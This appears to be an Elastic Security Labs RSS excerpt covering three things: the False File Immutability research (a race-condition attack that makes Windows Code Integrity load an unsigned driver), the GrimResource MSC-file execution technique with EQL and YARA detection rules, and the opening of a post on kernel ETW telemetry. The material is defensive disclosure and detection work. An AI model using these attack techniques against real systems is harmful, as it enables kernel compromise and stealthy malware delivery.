<p>Next, the file is opened without <strong>FILE_SHARE_WRITE</strong>, meaning write sharing is denied. This is intended to prevent modification of the security catalog during processing. However, as we have shown above, this is a bad assumption and another example of False File Immutability. It should be possible, in theory, to perform a PPLFault-style attack on security catalog processing.</p>
<h3>Planning the attack</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image11.png" alt="" /></p>
<p>The general flow of the attack is as follows:</p>
<ol>
<li>The attacker will plant a security catalog on a storage device that they control. They will install a symbolic link to this catalog in the <code>CatRoot</code> directory, so Windows knows where to find it.</li>
<li>The attacker asks the kernel to load a malicious unsigned kernel driver.</li>
<li>Code Integrity attempts to validate the driver, but it can’t find a signature or trusted authentihash, so it re-scans the CatRoot directory and finds the attacker’s new catalog.</li>
<li>CI maps the catalog into kernel memory and validates its signature. This generates page faults which are sent to the attacker’s storage device. The storage device returns a legitimate Microsoft-signed catalog.</li>
<li>The attacker empties the system working set, forcing all the previously-fetched catalog pages to be discarded.</li>
<li>CI begins parsing the catalog, generating new page faults. This time, the storage device injects the authentihash of their malicious driver.</li>
<li>CI finds the malicious driver’s authentihash in the catalog and loads the driver. At this point, the attacker has achieved arbitrary code execution in the kernel.</li>
</ol>
<h3>Implementation and considerations</h3>
<p>The plan is to use a PPLFault-style attack, but there are some important differences in this situation. PPLFault used an <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/opportunistic-locks">opportunistic lock</a> (oplock) to deterministically freeze the victim process’s initialization. This gave the attacker time to switch over to the payload and flush the system working set. Unfortunately, we couldn’t find any good opportunities for oplocks here. Instead, we’re going to pursue a probabilistic approach: rapidly toggling the security catalog between the malicious and benign versions.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image12.png" alt="The catalog being toggled between benign and malicious versions; only one hash changes" /></p>
<p>The verification step touches every page of the catalog, which means all of those pages will be resident in memory when parsing begins. If the attacker changes the catalog on their storage device, it won’t be reflected in memory until after a subsequent page fault. To evict these pages from kernel memory, the attacker must empty the working set between <strong>MinCrypK_VerifySignedDataKModeEx</strong> and <strong>I_MapFileHashes</strong>.</p>
<p>This approach is inherently a race condition. There’s no built-in delays between signature verification and catalog parsing - it’s a tight race. We’ll need to employ several techniques to widen our window of opportunity.</p>
<p>Most security catalogs on the system are small, a few kilobytes. By choosing a large 4MB catalog, we can greatly increase the amount of time that CI spends parsing. Assuming catalog parsing is linear, we can choose an authentihash near the end of the catalog to maximize the time between signature verification and when CI reaches our tampered page. Further, we will create threads for each CPU on the system whose sole purpose is to consume CPU cycles. These threads run at higher priority than CI, so CI will be starved of CPU time. There will be one thread dedicated to repeatedly flushing pages from the system’s working set, and one thread repeatedly attempting to load the unsigned driver.</p>
<p>This attack has two main failure modes. First, if the payload Authentihash is read during the signature check, then the signature will be invalid and the catalog will be rejected.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image17.png" alt="Code Integrity rejecting a tampered security catalog" /></p>
<p>Next, if an even number of toggles occur (including zero) between signature validation and parsing, then CI will parse the benign hash and reject our driver.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image6.png" alt="Passing the signature check, but the benign catalog is parsed" /></p>
<p>The attacker wins if CI validates a benign catalog then parses a malicious one.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image20.png" alt="Code Integrity validating a benign catalog, then parsing a malicious one" /></p>
<h3>Exploit demo</h3>
<p>We named the exploit <strong>ItsNotASecurityBoundary</strong> as an homage to MSRC's <a href="https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria">policy</a> that &quot;Administrator-to-kernel is not a security boundary.”  The code is in GitHub <a href="https://github.com/gabriellandau/ItsNotASecurityBoundary">here</a>.</p>
<p>Demo video <a href="https://drive.google.com/file/d/13Uw38ZrNeYwfoIuD76qlLgyXP8kRc8Nz/view?usp=sharing">here</a>.</p>
<h2>Understanding these vulnerabilities</h2>
<p>In order to properly defend against these vulnerabilities, we first need to understand them better.</p>
<p>A double-read (aka double-fetch) vulnerability can occur when victim code reads the same value out of an attacker-controlled buffer more than once. The attacker may change the value of this buffer between the reads, resulting in unexpected victim behavior.</p>
<p>Imagine there is a page of memory shared between two processes for an IPC mechanism. The client and server send data back and forth using the following struct. To send an IPC request, a client first writes a request struct into the shared memory page, then signals an event to notify the server of a pending request.</p>
<pre><code class="language-c">struct IPC_PACKET
{
    SIZE_T length;
    UCHAR data[];
};
</code></pre>
<p>A double-read attack could look something like this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image18.png" alt="An example of a double-read exploit using shared memory" /></p>
<p>First, the attacking client sets a packet’s structure’s length field to 16 bytes, then signals the server to indicate that a packet is ready for processing.  The victim server wakes up and allocates a 16-byte buffer using <code>malloc(pPacket-&gt;length)</code>.  Immediately afterwards, the attacker changes the length field to 32.  Next, the victim server attempts to copy the packet’s contents into the the new buffer by calling <code>memcpy(pBuffer, pPacket-&gt;data, pPacket-&gt;length)</code>, re-reading the value in <code>pPacket-&gt;length</code>, which is now 32.  The victim ends up copying 32 bytes into a 16-byte buffer, overflowing it.</p>
<p>Double-read vulnerabilities frequently apply to shared-memory scenarios. They commonly occur in drivers that operate on user-writable buffers. Due to False File Immutability, developers need to be aware that their scope is actually much wider, and includes all files writable by attackers. Denying write sharing does not necessarily prevent file modification.</p>
<h3>Affected Operations</h3>
<p>What types of operations are affected by False File Immutability?</p>
<table>
<thead>
<tr>
<th>Operation</th>
<th>API</th>
<th>Mitigations</th>
</tr>
</thead>
<tbody>
<tr>
<td>Image Sections</td>
<td><strong>CreateProcess</strong> <strong>LoadLibrary</strong></td>
<td>1. Enable Page Hashes</td>
</tr>
<tr>
<td>Data Sections</td>
<td><strong>MapViewOfFile</strong> <strong>ZwMapViewOfSection</strong></td>
<td>1. Avoid double reads\ 2. Copy the file to a heap buffer before processing\ 3. Prevent paging via MmProbeAndLockPages/VirtualLock</td>
</tr>
<tr>
<td>Regular I/O</td>
<td><strong>ReadFile</strong> <strong>ZwReadFile</strong></td>
<td>1. Avoid double reads\  2. Copy the file to a heap buffer before processing</td>
</tr>
</tbody>
</table>
<h3>What else could be vulnerable?</h3>
<p>Looking for potentially-vulnerable calls to <strong>ZwMapViewOfSection</strong> in the NT kernel yields quite a few interesting functions:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image8.png" alt="Potentially-vulnerable uses of ZwMapViewOfSection within the NT kernel" /></p>
<p>If we expand our search to regular file I/O, we find even more candidates. An important caveat, however, is that <strong>ZwReadFile</strong> may be used for more than just files. Only uses on files (or those which could be coerced into operating on files) could be vulnerable.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image14.png" alt="Potentially-vulnerable uses of ZwReadFile within the NT kernel" /></p>
<p>Looking outside of the NT kernel, we can find other drivers to investigate:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image2.png" alt="Potentially-vulnerable uses of ZwReadFile in Windows 11 kernel drivers" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image1.png" alt="Potentially-vulnerable uses of ZwMapViewOfSection in Windows 11 kernel drivers" /></p>
<h3>Don’t forget about user mode</h3>
<p>We’ve mostly been discussing the kernel up to this point, but it’s important to note that any user mode application that calls <strong>ReadFile</strong>, <strong>MapViewOfFile</strong>, or <strong>LoadLibrary</strong> on an attacker-controllable file, denying write sharing for immutability, may be vulnerable. Here’s a few hypothetical examples.</p>
<h4>MapViewOfFile</h4>
<p>Imagine an application that is split into two components - a low-privileged worker process with network access, and a privileged service that installs updates. The worker downloads updates and stages them to a specific folder. When the privileged service sees a new update staged, it first validates the signature before installing the update. An attacker could abuse FFI to modify the update after the signature check.</p>
<h4>ReadFile</h4>
<p>Since files are subject to double-read vulnerabilities, anything that parses complex file formats may be vulnerable, including antivirus engines and search indexers.</p>
<h4>LoadLibrary</h4>
<p>Some applications rely on UMCI to prevent attackers from loading malicious DLLs into their processes. As we’ve shown with PPLFault, FFI can defeat UMCI.</p>
<h2>Stopping the exploit</h2>
<p>Per their official servicing guidelines, MSRC won’t service Admin -&gt; Kernel vulnerabilities by default. In this parlance, servicing means “fix via security update.”  This type of vulnerability, however, allows malware to bypass <a href="https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">AV Process Protections</a>, leaving AV and EDR vulnerable to instant-kill attacks.</p>
<p>As a third-party, we can’t patch Code Integrity, so what can we do to protect our customers? To mitigate <strong>ItsNotASecurityBoundary</strong>, we created <strong>FineButWeCanStillEasilyStopIt</strong>, a filesystem minifilter driver that prevents Code Integrity from opening security catalogs over network redirectors. You can find it on GitHub <a href="https://github.com/gabriellandau/ItsNotASecurityBoundary/tree/main/FineButWeCanStillEasilyStopIt">here</a>.</p>
<p>FineButWeCanStillEasilyStopIt has to jump through some hoops to correctly identify the problematic behavior while minimizing false positives. Ideally, CI itself could be fixed with a few small changes. Let’s look at what that would take.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image13.png" alt="Fixing catalog processing by copying the catalog to the heap" /></p>
<p>As mentioned above in the Affected Operations section, applications can mitigate double-read vulnerabilities by copying the file contents out of the file mapping into the heap, and exclusively using that heap copy for all subsequent operations. The kernel heap is called the <a href="https://learn.microsoft.com/en-us/windows/win32/memory/memory-pools">pool</a>, and the corresponding allocation function is <strong>ExAllocatePool</strong>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image15.png" alt="Fixing catalog processing by locking the pages into RAM" /></p>
<p>An alternative mitigation strategy to break these types of exploits is to pin the pages of the file mapping into physical memory using an API such as <strong>MmProbeAndLockPages</strong>. This prevents eviction of those pages when the attacker empties the working set.</p>
<h3>End-user detection and mitigation</h3>
<p>Fortunately, there is a way for end-users to mitigate this exploit without changes from Microsoft – Hypervisor Protected Code Integrity (HVCI). If HVCI is enabled, CI.dll doesn’t do catalog parsing at all. Instead, it sends the catalog contents to the Secure Kernel, which runs in a separate virtual machine on the same host. The Secure Kernel stores the received catalog contents in its own heap, from which signature validation and parsing are performed. Just like with the <strong>ExAllocatePool</strong> mitigation described above, the exploit is mitigated because file changes have no effect on the heap copy.</p>
<p>The probabilistic nature of this attack means that there are likely many failed attempts. Windows records these failures in the <strong>Microsoft-Windows-CodeIntegrity/Operational</strong> event log. Users can check this log for evidence of exploitation.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image23.png" alt="Microsoft-Windows-CodeIntegrity/Operational event log showing an invalid driver signature" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image4.png" alt="Microsoft-Windows-CodeIntegrity/Operational event log showing an invalid security catalog" /></p>
<h2>Disclosure</h2>
<p>The disclosure timeline is as follows:</p>
<ul>
<li>2024-02-14: We reported ItsNotASecurityBoundary and FineButWeCanStillEasilyStopIt to MSRC as VULN-119340, suggesting <strong>ExAllocatePool</strong> and <strong>MmProbeAndLockPages</strong> as simple low-risk fixes</li>
<li>2024-02-29: The Windows Defender team reached out to coordinate disclosure</li>
<li>2024-04-23: Microsoft releases <a href="https://support.microsoft.com/en-us/topic/april-23-2024-kb5036980-os-builds-22621-3527-and-22631-3527-preview-5a0d6c49-e42e-4eb4-8541-33a7139281ed">KB5036980</a> Preview with the <strong>MmProbeAndLockPages</strong> fix</li>
<li>2024-05-14: Fix reaches GA for Windows 11 23H2 as <a href="https://support.microsoft.com/en-us/topic/may-14-2024-kb5037771-os-builds-22621-3593-and-22631-3593-e633ff2f-a021-4abb-bd2e-7f3687f166fe">KB5037771</a>; we have not tested any other platforms (Win10, Server, etc).</li>
<li>2024-06-14: MSRC closed the case, stating &quot;We have completed our investigation and determined that the case doesn't meet our bar for servicing at this time. As a result, we have opened a next-version candidate bug for the issue, and it will be evaluated for upcoming releases. Thanks, again, for sharing this report with us.&quot;</li>
</ul>
<h2>Fixing Code Integrity</h2>
<p>Looking at the original implementation of <strong>CI!I_MapAndSizeDataFile</strong>, we can see the legacy code calling <strong>ZwCreateSection</strong> and <strong>ZwMapViewOfSection</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image22.png" alt="The vulnerable CI!I_MapAndSizeDataFile implementation" /></p>
<p>Contrast that with the new <strong>CI!CipMapAndSizeDataFileWithMDL</strong>, which follows that up with <strong>MmProbeAndLockPages</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/image3.png" alt="The new CI!CipMapAndSizeDataFileWithMDL has a mitigation" /></p>
<h2>Summary and conclusion</h2>
<p>Today we discussed and named a bug class: <strong>False File Immutability</strong>. We are aware of two public exploits that leverage it, PPLFault and ItsNotASecurityBoundary.</p>
<p><a href="https://github.com/gabriellandau/PPLFault">PPLFault</a>: Admin -&gt; PPL [-&gt; Kernel via GodFault]</p>
<ul>
<li>Exploits bad immutability assumptions about image section in CI/MM</li>
<li>Reported September 2022</li>
<li>Patched February 2024 (~510 days later)</li>
</ul>
<p><a href="https://github.com/gabriellandau/ItsNotASecurityBoundary">ItsNotASecurityBoundary</a>: Admin -&gt; Kernel</p>
<ul>
<li>Exploits bad immutability assumptions about data sections in CI</li>
<li>Reported February 2024</li>
<li>Patched May 2024 (~90 days later)</li>
</ul>
<p>If you are writing Windows code that operates on files, you need to be aware of the fact these files may be modified while you are working on them, even if you deny write sharing. See the Affected Operations section above for guidance on how to protect yourselves and your customers against these types of attacks.</p>
<p>ItsNotASecurityBoundary is not the end of FFI. There are other exploitable FFI vulnerabilities out there. My colleagues and I at Elastic Security Labs will continue exploring and reporting on FFI and beyond. We encourage you to follow along on X <a href="https://x.com/GabrielLandau">@GabrielLandau</a> and <a href="https://x.com/elasticseclabs">@ElasticSecLabs</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/false-file-immutability/Security Labs Images 36.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[GrimResource - Microsoft Management Console for initial access and evasion]]></title>
            <link>https://www.elastic.co/kr/security-labs/grimresource</link>
            <guid>grimresource</guid>
            <pubDate>Sat, 22 Jun 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic researchers uncovered a new technique, GrimResource, which allows full code execution via specially crafted MSC files. It underscores a trend of well-resourced attackers favoring innovative initial access methods to evade defenses.]]></description>
            <content:encoded><![CDATA[<h2>Overview</h2>
<p>After Microsoft <a href="https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked">disabled</a> office macros by default for internet-sourced documents, other infection vectors like JavaScript, MSI files, LNK objects, and ISOs have surged in popularity. However, these other techniques are scrutinized by defenders and have a high likelihood of detection. Mature attackers seek to leverage new and undisclosed infection vectors to gain access while evading defenses. A <a href="https://www.genians.co.kr/blog/threat_intelligence/facebook">recent example</a> involved DPRK actors using a new command execution technique in MSC files.</p>
<p>Elastic researchers have uncovered a new infection technique also leveraging MSC files, which we refer to as GrimResource. It allows attackers to gain full code execution in the context of <code>mmc.exe</code> after a user clicks on a specially crafted MSC file. A <a href="https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb">sample</a> leveraging GrimResource was first uploaded to VirusTotal on June 6th.</p>
<h2>Key takeaways</h2>
<ul>
<li>Elastic Security researchers uncovered a novel, in-the-wild code execution technique leveraging specially crafted MSC files referred to as GrimResource</li>
<li>GrimResource allows attackers to execute arbitrary code in Microsoft Management Console (<code>mmc.exe</code>) with minimal security warnings, ideal for gaining initial access and evading defenses</li>
<li>Elastic is providing analysis of the technique and detection guidance so the community can protect themselves</li>
</ul>
<h2>Analysis</h2>
<p>The key to the <a href="https://gist.github.com/joe-desimone/2b0bbee382c9bdfcac53f2349a379fa4">GrimResource</a> technique is using an old <a href="https://medium.com/@knownsec404team/from-http-domain-to-res-domain-xss-by-using-ie-adobes-pdf-activex-plugin-ba4f082c8199">XSS flaw</a> present in the <code>apds.dll</code> library. By adding a reference to the vulnerable APDS resource in the appropriate StringTable section of a crafted MSC file, attackers can execute arbitrary javascript in the context of <code>mmc.exe</code>. Attackers can combine this technique with <a href="https://github.com/tyranid/DotNetToJScript/tree/master">DotNetToJScript</a> to gain arbitrary code execution.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image17.png" alt="Reference to apds.dll redirect in StringTable" title="Reference to apds.dll redirect in StringTable" /></p>
<p>At the time of writing, the sample identified in the wild had 0 static detections in <a href="https://www.virustotal.com/gui/file/14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb/details">VirusTotal</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image1.png" alt="VirusTotal results" title="VirusTotal results" /></p>
<p>The sample begins with a transformNode obfuscation technique, which was observed in recent but unrelated <a href="https://twitter.com/decalage2/status/1773114380013461799">macro samples</a>. This aids in evading ActiveX security warnings.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image15.png" alt="transformNode evasion and obfuscation technique" title="transformNode evasion and obfuscation technique" /></p>
<p>This leads to an obfuscated embedded VBScript, as reconstructed below:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image8.png" alt="Obfuscated VBScript" title="Obfuscated VBScript" /></p>
<p>The VBScript sets the target payload in a series of environment variables and then leverages the <a href="https://github.com/tyranid/DotNetToJScript/blob/master/DotNetToJScript/Resources/vbs_template.txt">DotNetToJs</a> technique to execute an embedded .NET loader. We named this component PASTALOADER and may release additional analysis on this specific tool in the future.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image13.png" alt="Setting the target payload environment variables" title="Setting the target payload environment variables" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image2.png" alt="DotNetToJs loading technique" title="DotNetToJs loading technique" /></p>
<p>PASTALOADER retrieves the payload from environment variables set by the VBScript in the previous step:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image14.png" alt="PASTALOADER loader retrieving the payload" title="PASTALOADER loader retrieving the payload" /></p>
<p>Finally, PASTALOADER spawns a new instance of <code>dllhost.exe</code> and injects the payload into it. This is done in a deliberately stealthy manner using the <a href="https://github.com/ipSlav/DirtyCLR/tree/7b1280fee780413d43adbad9f4c2a9ce7ed9f29e">DirtyCLR</a> technique, function unhooking, and indirect syscalls. In this sample, the final payload is Cobalt Strike.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image7.png" alt="Payload injected into dllhost.exe" title="Payload injected into dllhost.exe" /></p>
<h2>Detections</h2>
<p>In this section, we will examine current behavior detections for this sample and present new, more precise ones aimed at the technique primitives.</p>
<h3>Suspicious Execution via Microsoft Common Console</h3>
<p>This detection was established prior to our discovery of this new execution technique. It was originally designed to identify a <a href="https://www.genians.co.kr/blog/threat_intelligence/facebook">different method</a> (which requires the user to click on the Taskpad after opening the MSC file) that exploits the same MSC file type to execute commands through the Console Taskpads command line attribute:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image12.png" alt="Command task MSC sample" title="Command task MSC sample" /></p>
<pre><code>process where event.action == &quot;start&quot; and
 process.parent.executable : &quot;?:\\Windows\\System32\\mmc.exe&quot; and  process.parent.args : &quot;*.msc&quot; and
 not process.parent.args : (&quot;?:\\Windows\\System32\\*.msc&quot;, &quot;?:\\Windows\\SysWOW64\\*.msc&quot;, &quot;?:\\Program files\\*.msc&quot;, &quot;?:\\Program Files (x86)\\*.msc&quot;) and
 not process.executable :
              (&quot;?:\\Windows\\System32\\mmc.exe&quot;,
               &quot;?:\\Windows\\System32\\wermgr.exe&quot;,
               &quot;?:\\Windows\\System32\\WerFault.exe&quot;,
               &quot;?:\\Windows\\SysWOW64\\mmc.exe&quot;,
               &quot;?:\\Program Files\\*.exe&quot;,
               &quot;?:\\Program Files (x86)\\*.exe&quot;,
               &quot;?:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.EXE&quot;,
               &quot;?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe&quot;)
</code></pre>
<p>It triggers here because this sample opted to spawn and inject a sacrificial instance of dllhost.exe:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image10.png" alt="GrimResource detected" title="GrimResource detected" /></p>
<h3>.NET COM object created in non-standard Windows Script Interpreter</h3>
<p>The sample is using the <a href="https://github.com/tyranid/DotNetToJScript">DotNetToJScript</a> technique, which triggers another detection looking for RWX memory allocation from .NET on behalf of a Windows Script Host (WSH) script engine (Jscript or Vbscript):</p>
<p>The following EQL rule will detect execution via the .NET loader:</p>
<pre><code>api where
  not process.name : (&quot;cscript.exe&quot;, &quot;wscript.exe&quot;) and
  process.code_signature.trusted == true and
  process.code_signature.subject_name : &quot;Microsoft*&quot; and
  process.Ext.api.name == &quot;VirtualAlloc&quot; and
  process.Ext.api.parameters.allocation_type == &quot;RESERVE&quot; and 
  process.Ext.api.parameters.protection == &quot;RWX&quot; and
  process.thread.Ext.call_stack_summary : (
    /* .NET is allocating executable memory on behalf of a WSH script engine
     * Note - this covers both .NET 2 and .NET 4 framework variants */
    &quot;*|mscoree.dll|combase.dll|jscript.dll|*&quot;,
    &quot;*|mscoree.dll|combase.dll|vbscript.dll|*&quot;,
    &quot;*|mscoree.dll|combase.dll|jscript9.dll|*&quot;,
    &quot;*|mscoree.dll|combase.dll|chakra.dll|*&quot;
)
</code></pre>
<p>The following alert shows <code>mmc.exe</code> allocating RWX memory and the <code>process.thread.Ext.call_stack_summary </code>captures the origin of the allocation from <code>vbscript.dll</code> to <code>clr.dll</code> :</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image6.png" alt="mmc.exe allocating RWX memory" title="mmc.exe allocating RWX memory" /></p>
<h3>Script Execution via MMC Console File</h3>
<p>The two previous detections were triggered by specific implementation choices to weaponize the GrimResource method (DotNetToJS and spawning a child process). These detections can be bypassed by using more OPSEC-safe alternatives.</p>
<p>Other behaviors that might initially seem suspicious — such as <code>mmc.exe</code> loading <code>jscript.dll</code>, <code>vbscript.dll</code>, and <code>msxml3.dll</code> — can be clarified compared to benign data. We can see that, except for <code>vbscript.dll</code>, these WSH engines are typically loaded by <code>mmc.exe</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image4.png" alt="Normal library load behaviors by mmc.exe" title="Normal library load behaviors by mmc.exe" /></p>
<p>The core aspect of this method involves using <a href="https://strontic.github.io/xcyclopedia/library/apds.dll-DF461ADCCD541185313F9439313D1EE1.html">apds.dll</a> to execute Jscript via XSS. This behavior is evident in the mmc.exe Procmon output as a <code>CreateFile</code> operation (<code>apds.dll</code> is not loaded as a library):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image9.png" alt="apds.dll being invoked in the MSC StringTable" title="apds.dll being invoked in the MSC StringTable" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image16.png" alt="Example of the successful execution of GrimResource" title="Example of the successful execution of GrimResource" /></p>
<p>We added the following detection using Elastic Defend file open events where the target file is <code>apds.dll</code> and the <code>process.name</code> is <code>mmc.exe</code>:</p>
<p>The following EQL rule will detect the execution of a script from the MMC console:</p>
<pre><code>sequence by process.entity_id with maxspan=1m
 [process where event.action == &quot;start&quot; and
  process.executable : &quot;?:\\Windows\\System32\\mmc.exe&quot; and process.args : &quot;*.msc&quot;]
 [file where event.action == &quot;open&quot; and file.path : &quot;?:\\Windows\\System32\\apds.dll&quot;]
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image5.png" alt="Timeline showing the script execution with the MMC console" title="Timeline showing the script execution with the MMC console" /></p>
<h3>Windows Script Execution via MMC Console File</h3>
<p>Another detection and forensic artifact is the creation of a temporary HTML file in the INetCache folder, named <code>redirect[*] </code>as a result of the APDS <a href="https://owasp.org/www-community/attacks/xss/">XSS</a> redirection:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image11.png" alt="Contents of redirect.html" title="Contents of redirect.html" /></p>
<p>The following EQL correlation can be used to detect this behavior while also capturing the msc file path:</p>
<pre><code>sequence by process.entity_id with maxspan=1m
 [process where event.action == &quot;start&quot; and
  process.executable : &quot;?:\\Windows\\System32\\mmc.exe&quot; and process.args : &quot;*.msc&quot;]
 [file where event.action in (&quot;creation&quot;, &quot;overwrite&quot;) and
  process.executable :  &quot;?:\\Windows\\System32\\mmc.exe&quot; and file.name : &quot;redirect[?]&quot; and 
  file.path : &quot;?:\\Users\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\*\\redirect[?]&quot;]
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/grimresource/image3.png" alt="Timeline detecting redirect.html" title="Timeline detecting redirect.html" /></p>
<p>Alongside the provided behavior rules, the following YARA rule can be used to detect similar files:</p>
<pre><code>rule Windows_GrimResource_MMC {
    meta:
        author = &quot;Elastic Security&quot;
        reference = &quot;https://www.elastic.co/kr/security-labs/GrimResource&quot;
        reference_sample = &quot;14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb&quot;
        arch_context = &quot;x86&quot;
        scan_context = &quot;file, memory&quot;
        license = &quot;Elastic License v2&quot;
        os = &quot;windows&quot;
    strings:
        $xml = &quot;&lt;?xml&quot;
        $a = &quot;MMC_ConsoleFile&quot; 
        $b1 = &quot;apds.dll&quot; 
        $b2 = &quot;res://&quot;
        $b3 = &quot;javascript:eval(&quot;
        $b4 = &quot;.loadXML(&quot;
    condition:
       $xml at 0 and $a and 2 of ($b*)
}
</code></pre>
<h2>Conclusion</h2>
<p>Attackers have developed a new technique to execute arbitrary code in Microsoft Management Console using crafted MSC files. Elastic’s existing out of the box coverage shows our defense-in-depth approach is effective even against novel threats like this. Defenders should leverage our detection guidance to protect themselves and their customers from this technique before it proliferates into commodity threat groups.</p>
<h2>Observables</h2>
<p>All observables are also <a href="https://github.com/elastic/labs-releases/tree/main/indicators/grimresource">available for download</a> in both ECS and STIX formats.</p>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th>Observable</th>
<th>Type</th>
<th>Name</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>14bcb7196143fd2b800385e9b32cfacd837007b0face71a73b546b53310258bb</code></td>
<td>SHA-256</td>
<td><code>sccm-updater.msc</code></td>
<td>Abused MSC file</td>
</tr>
<tr>
<td><code>4cb575bc114d39f8f1e66d6e7c453987639289a28cd83a7d802744cd99087fd7</code></td>
<td>SHA-256</td>
<td>N/A</td>
<td>PASTALOADER</td>
</tr>
<tr>
<td><code>c1bba723f79282dceed4b8c40123c72a5dfcf4e3ff7dd48db8cb6c8772b60b88</code></td>
<td>SHA-256</td>
<td>N/A</td>
<td>Cobalt Strike payload</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/grimresource/grimresource.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks]]></title>
            <link>https://www.elastic.co/kr/security-labs/doubling-down-etw-callstacks</link>
            <guid>doubling-down-etw-callstacks</guid>
            <pubDate>Tue, 09 Jan 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[With Elastic Security 8.11, we added further kernel telemetry call stack-based detections to increase efficacy against in-memory threats.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>We were pleased to see that the <a href="https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks">kernel call stack</a> capability we released in 8.8 was met with <a href="https://x.com/Kostastsale/status/1664050735166930944">extremely</a> <a href="https://x.com/HackingLZ/status/1663897174806089728">positive</a> <a href="https://twitter.com/bohops/status/1726251988244160776">community feedback</a> - both from the offensive research teams attempting to evade us and the defensive teams triaging alerts faster due to the additional <a href="https://www.elastic.co/kr/security-labs/peeling-back-the-curtain-with-call-stacks">context</a>.</p>
<p>But this was only the first step: We needed to arm defenders with even more visibility from the kernel - the most reliable mechanism to combat user-mode threats. With the introduction of Kernel Patch Protection in x64 Windows, Microsoft created a shared responsibility model where security vendors are now limited to only the kernel visibility and extension points that Microsoft provides. The most notable addition to this visibility is the <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/master/manifest/Microsoft-Windows-Threat-Intelligence.tsv">Microsoft-Windows-Threat-Intelligence Event Tracing for Windows</a>(ETW) provider.</p>
<p>Microsoft has identified a handful of highly security-relevant syscalls and provided security vendors with near real-time telemetry of those. While we would strongly prefer inline callbacks that allow synchronous blocking of malicious activity, Microsoft has implicitly not deemed this a necessary security use case yet. Currently, the only filtering mechanism afforded to security vendors for these syscalls is user-mode hooking - and that approach is <a href="https://blogs.blackberry.com/en/2017/02/universal-unhooking-blinding-security-software">inherently</a> <a href="https://www.cyberbit.com/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/">fragile</a>. At Elastic, we determined that a more robust detection approach based on kernel telemetry collected through ETW would provide greater security benefits than easily bypassed user-mode hooks. That said, kernel ETW does have some <a href="https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs">systemic issues</a> that we have logged with Microsoft, along with suggested <a href="https://www.elastic.co/kr/security-labs/finding-truth-in-the-shadows">mitigations</a>.</p>
<h2>Implementation</h2>
<p>Endpoint telemetry is a careful balance between completeness and cost. Vendors don’t want to balloon your SIEM storage costs unnecessarily, but they also don't want you to miss the critical indicator of compromise. To reduce event volumes for these new API events, we fingerprint each event and only emit it if it is unique. This deduplication ensures a minimal impact on detection fidelity.</p>
